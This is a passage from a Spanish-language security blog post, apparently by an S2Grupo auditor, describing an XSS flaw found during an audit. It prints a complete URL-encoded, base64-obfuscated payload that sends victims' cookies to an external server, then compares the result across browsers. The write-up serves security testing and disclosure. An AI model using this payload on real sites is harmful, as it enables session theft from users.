1. XSS
En una de las auditorías que realizamos desde S2GRUPO me topé con una página web vulnerable a XSS y CSRF.
En relación al XSS se logró con éxito el ataque en una entrada de datos que no sanitizaba correctamente los caracteres “,/ y > entre otros, temiéndome lo peor fui directamente a probar los payloads que mayor impacto poseían en cuánto a robo de información, por lo que con el payload %27%22()%26%27%3Cstring%3E%3CScRiPt%3Eeval(atob(%27ZmV0Y2goJ2hedHBz0i8vejc3YnhzMGxkemdndWNvODhzaGg4Z3V6M3E5aHg3bHcub2FzdGlmeS5jb20vP2Nvb2tpZVZpY3RpbWE9Jytkb2N1bWVudC5jb29raWUp%27))%3C/ScRiPt%3E, dónde el texto en base 64 es fetch(‘http://EXPLOIT.server/?cookieVictim=’+document.cookie) se conseguían exfiltrar las cookies de la propia web a un servidor externo controlado por S2grupo una vez la víctima una vez autenticada en la web clicaba en el enlace.
Una vez hallada esta vulnerabilidad, seguí los mismos pasos para desencadenar el XSS en navegadores como Mozilla Firefox, Chrome, brave y Microsoft Edge, de esta manera me haría una idea de cuál sería el motivo por el que las cookies no llegan al servidor de explotación en caso de que la víctima clicase en el enlace malicioso.
Cómo se puede apreciar en la siguiente ilustración, se consiguen las cookies una vez una supuesta víctima haya clicado en el enlace, en este caso el navegador utilizado es Microsoft Edge.

Sin embargo, en un navegador como Brave se puede apreciar como estas cookies nunca llegan al parámetro personalizado cookieVictim.
[Read more…]